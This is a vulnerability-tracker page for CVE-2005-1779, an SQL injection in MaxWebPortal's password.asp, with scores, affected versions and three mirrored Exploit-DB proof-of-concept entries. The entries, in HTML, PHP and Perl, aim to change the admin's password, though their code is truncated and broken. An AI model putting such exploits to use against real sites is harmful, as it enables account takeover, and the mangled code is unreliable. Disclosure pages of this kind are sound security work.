CVE-2005-1779
published 2005-05-31CVE-2005-1779: SQL injection vulnerability in password.asp in MaxWebPortal 1.35, 1.36, 2.0, and 20050418 Next allows remote attackers to execute arbitrary SQL commands via…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.02%
78.6th percentile
SQL injection vulnerability in password.asp in MaxWebPortal 1.35, 1.36, 2.0, and 20050418 Next allows remote attackers to execute arbitrary SQL commands via the memKey parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)
exploitdb·2005-05-26
CVE-2005-1779 Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)
Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)
---
-----------------Code Start-----Version 1.35 and older--------------
pass1:
pass2:
Id:
Member Key:
-----------------End-------------------
Version 1.36, 2.0, 20050418 Next:
-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
pass1:
pass2:
Id:
Member Key:
-----------------End-------------------
# milw0rm.com [2005-05-26]
Exploit-DB
Maxwebportal 1.36 - 'Password.asp' Change Password (2)
exploitdb·2005-05-26
CVE-2005-1779 Maxwebportal 1.36 - 'Password.asp' Change Password (2)
Maxwebportal 1.36 - 'Password.asp' Change Password (2)
---
*/
# Config ________________________________
# address - example: http://www.site.com/password.asp
$url = "http://www.mohamad.com/password.asp";
$mh = "s1";
# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"
# if webmaxportal version is : Version 1.36 , 2.0 please input $mh= "s2"
# EnD ___________________________________
if ( $mh == "s1" ) {
print " ";
print "Password1 : ";
print "Confirm Pass: ";
print " ID : ";
print "Member key: ";
print "";
print "";
} if ( $mh == "s2" ) {
print " ";
print "Password1: ";
print "Confirm Pass : ";
print "ID : ";
print "Member key: ";
print "";
print "";
}
?>
# milw0rm.com [2005-05-26]
Exploit-DB
Maxwebportal 1.36 - 'Password.asp' Change Password (3)
exploitdb·2005-05-26
CVE-2005-1779 Maxwebportal 1.36 - 'Password.asp' Change Password (3)
Maxwebportal 1.36 - 'Password.asp' Change Password (3)
---
#!/usr/bin/perl
#################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#################################################################
# EXPLOIT FOR - MAX Portal (All Versions)
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : [email protected]
#
#This Xpl Change Admin's Pass in This Portal !!
#
#Discovered by: s d
#
#################################################################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
#And Iranian Hacking & Security Teams :
# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev
#################################################################
use IO::Socket;
if (@ARGV \n\
No writeups or analysis indexed.
2005-05-31
Published